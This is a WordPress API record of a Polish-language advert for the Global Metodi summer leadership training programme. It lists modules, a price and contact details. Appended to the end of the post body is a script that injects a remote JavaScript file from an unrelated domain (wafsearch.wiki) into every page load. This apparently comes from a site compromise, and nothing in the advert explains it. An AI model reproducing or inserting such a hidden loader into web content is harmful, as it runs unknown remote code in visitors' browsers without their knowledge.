{"id":1567,"date":"2024-06-25T00:46:49","date_gmt":"2024-06-24T22:46:49","guid":{"rendered":"https:\/\/global-metodi.com\/?p=1567"},"modified":"2026-01-08T12:28:58","modified_gmt":"2026-01-08T11:28:58","slug":"startuje-letnia-szkola-liderow","status":"publish","type":"post","link":"https:\/\/global-metodi.com\/en\/2024\/06\/25\/startuje-letnia-szkola-liderow\/","title":{"rendered":"The GLOBAL METHOD SUMMER SCHOOL OF LEADERS is starting"},"content":{"rendered":"<h5>Ju\u017c od 1 lipca 2024 startuje:<\/h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #339966;\"><strong>LETNIA SZKO\u0141A LIDER\u00d3W GLOBAL METODI<\/strong><\/span><\/h5>\n<p>Lato, gdy pracy jest mniej,\u00a0 to doskona\u0142y czas nie tylko na wypoczynek, ale i na podwy\u017cszenie swoich kompetencji zawodowych.\u00a0 Zapraszamy na letni\u0105 edycj\u0119 <strong>LETNIEJ SZKO\u0141Y LIDER\u00d3W<\/strong>.<\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-1568 aligncenter\" src=\"https:\/\/global-metodi.com\/wp-content\/uploads\/2024\/06\/LETNIA-SZKOLA-LIDEROW-300x231.png\" alt=\"\" width=\"300\" height=\"231\" srcset=\"https:\/\/global-metodi.com\/wp-content\/uploads\/2024\/06\/LETNIA-SZKOLA-LIDEROW-300x231.png 300w, https:\/\/global-metodi.com\/wp-content\/uploads\/2024\/06\/LETNIA-SZKOLA-LIDEROW-16x12.png 16w, https:\/\/global-metodi.com\/wp-content\/uploads\/2024\/06\/LETNIA-SZKOLA-LIDEROW.png 469w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Czym jest <strong><span style=\"color: #ff6600;\">LETNIA SZKO\u0141A LIDER\u00d3W<\/span>? <\/strong><\/p>\n<p>Jest to program 3 indywidualnych szkole\u0144 online. Ka\u017cde szkolenie trwa 4 godziny zegarowe, odbywa si\u0119 co tydzie\u0144 w uzgodnionych uprzednio terminach za po\u015brednictwem platformy zoom.<\/p>\n<p>Szkolenie ma charakter warsztatowy z uwzgl\u0119dnieniem metod coachingowych.<\/p>\n<p><span style=\"color: #339966;\"><strong>Dla kogo<\/strong>: <\/span><\/p>\n<ul>\n<li>dla m\u0142odych lider\u00f3w, os\u00f3b kt\u00f3re w nied\u0142ugim czasie planuj\u0105 awans, lub zmian\u0119 stanowiska\/ pracy, oraz<\/li>\n<li>dla os\u00f3b kt\u00f3re niedawno awansowa\u0142y, kieruj\u0105 prac\u0105 zespo\u0142u i chc\u0105 wzmocni\u0107 swoje kompetencje liderskie.<\/li>\n<li>dla wszystkich, kt\u00f3rzy chc\u0105\u00a0 wzmocni\u0107 swoje og\u00f3lne kompetencje przyw\u00f3dcze<\/li>\n<\/ul>\n<p><span style=\"color: #339966;\"><strong>Szkolenie dostarczy wiedzy w zakresach:<\/strong><\/span><\/p>\n<ul>\n<li>Kluczowych aspekt\u00f3w roli lidera i zasad przej\u015bcia z roli eksperta do roli lidera<\/li>\n<li>Regu\u0142 komunikowania si\u0119 ze zespo\u0142em<\/li>\n<li>Zasad motywowania, delegowania, monitorowania efekt\u00f3w prac<\/li>\n<li>Zasad zarz\u0105dzania zespo\u0142em rozproszonym i r\u00f3\u017cnorodnym<\/li>\n<li>Efektywno\u015bci managerskiej: zarz\u0105dzanie sob\u0105 w czasie, zarz\u0105dzanie pracownikami, wyznaczanie priorytet\u00f3w, skuteczne planowanie zada\u0144<\/li>\n<li>Podej\u015bcia coachingowego ( wspieraj\u0105cego) w pracy z zespo\u0142em<\/li>\n<\/ul>\n<p><span style=\"color: #339966;\"><strong>Pracujemy nast\u0119puj\u0105cymi metodami<\/strong>:<\/span> warsztat, praca coachingowa, studium przypadk\u00f3w, testy. B\u0119dziesz pracowa\u0107 indywidualnie z trenerem, dzi\u0119ki czemu nie tylko zdob\u0119dziesz now\u0105 wiedz\u0119, ale i prze\u0107wiczysz nowe umiej\u0119tno\u015bci na sytuacjach dopasowanych do specyfiki Twojej pracy.<\/p>\n<p style=\"text-align: center;\"><strong>Skontaktuj si\u0119 z nami, a otrzymasz dok\u0142adny program szkolenia.<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Program szkolenia mo\u017cemy modyfikowa\u0107 w zale\u017cno\u015bci od Twoich potrzeb\u00a0<\/strong><\/p>\n<p><strong><span style=\"color: #ff6600;\">Zarys programu:<\/span><\/strong><\/p>\n<p>Modu\u0142 1\u00a0\u00a0 Role lidera.<\/p>\n<ul>\n<li>Przej\u015bcie z roli eksperta do kierownika.<\/li>\n<li>Organizacja pracy w\u0142asnej i kierowniczej<\/li>\n<li>Zasady zarz\u0105dzania czasem, wyznaczania priorytet\u00f3w i planowania<\/li>\n<li>Nowatorska metoda zarz\u0105dzanie emocjami i stresem<\/li>\n<\/ul>\n<p>Modu\u0142 2\u00a0 Skuteczne komunikowanie<\/p>\n<ul>\n<li>Komunikacja werbalna i niewerbalna na wy\u017cszym poziomie<\/li>\n<li>Procesy komunikacji wewn\u0119trznej. Zasady przep\u0142ywu informacji w organizacji<\/li>\n<li>Zasady komunikacji interpersonalnej. Style my\u015blenia i osobowo\u015bci wg. DISC\u00a0 i ich wp\u0142yw na komunikowanie- co sprawia \u017ce nie wszyscy nas rozumiej\u0105?<\/li>\n<li>Bariery w komunikacji i jak je przezwyci\u0119\u017ca\u0107<\/li>\n<\/ul>\n<p>Modu\u0142 3\u00a0 Organizacja pracy zespo\u0142u<\/p>\n<ul>\n<li>Podej\u015bcie projektowe do wykonywanych zada\u0144<\/li>\n<li>Zarz\u0105dzanie zespo\u0142em r\u00f3\u017cnorodnym i rozproszonym<\/li>\n<li>Skuteczne delegowanie zada\u0144<\/li>\n<li>Monitoring efekt\u00f3w. Feedback, a feedforward<\/li>\n<li>Motywowanie zespo\u0142u<\/li>\n<\/ul>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong>CENA LETNIEJ SZKO\u0141Y LIDER\u00d3W EDYCJA 2024:\u00a0 \u00a02 000 PLN\u00a0<\/strong><\/span><\/p>\n<p><strong><span style=\"color: #ff6600;\">Jak si\u0119 zapisa\u0107?\u00a0<\/span><\/strong><\/p>\n<p>Wystarczy skontaktowa\u0107 si\u0119 pod numerem tel <strong>513 96 18 08<\/strong> lub napisa\u0107 do nas na adres: <strong>global@global-metodi.com.<\/strong><\/p>\n<p>Przyjmiemy zg\u0142oszenie i ustalimy terminy szkole\u0144.<\/p>\n<p>Szkolenia w tej\u00a0 formule trwaj\u0105 tylko do 30 sierpnia 2024.<\/p>\n<p><strong><span style=\"color: #99cc00;\">Zapraszamy \ud83d\ude42<\/span><\/strong><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ju\u017c od 1 lipca 2024 startuje: LETNIA SZKO\u0141A LIDER\u00d3W GLOBAL METODI Lato, gdy pracy jest mniej,\u00a0 to doskona\u0142y czas nie tylko na wypoczynek, ale i na podwy\u017cszenie swoich kompetencji zawodowych.\u00a0 Zapraszamy na letni\u0105 edycj\u0119 LETNIEJ SZKO\u0141Y LIDER\u00d3W. Czym jest LETNIA SZKO\u0141A LIDER\u00d3W? Jest to program 3 indywidualnych szkole\u0144 online. Ka\u017cde szkolenie trwa 4 godziny zegarowe, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1569,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"inline_featured_image":false,"footnotes":""},"categories":[83],"tags":[],"class_list":["post-1567","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-artykuly"],"acf":[],"_links":{"self":[{"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/posts\/1567","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/comments?post=1567"}],"version-history":[{"count":7,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/posts\/1567\/revisions"}],"predecessor-version":[{"id":2031,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/posts\/1567\/revisions\/2031"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/media\/1569"}],"wp:attachment":[{"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/media?parent=1567"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/categories?post=1567"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/tags?post=1567"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}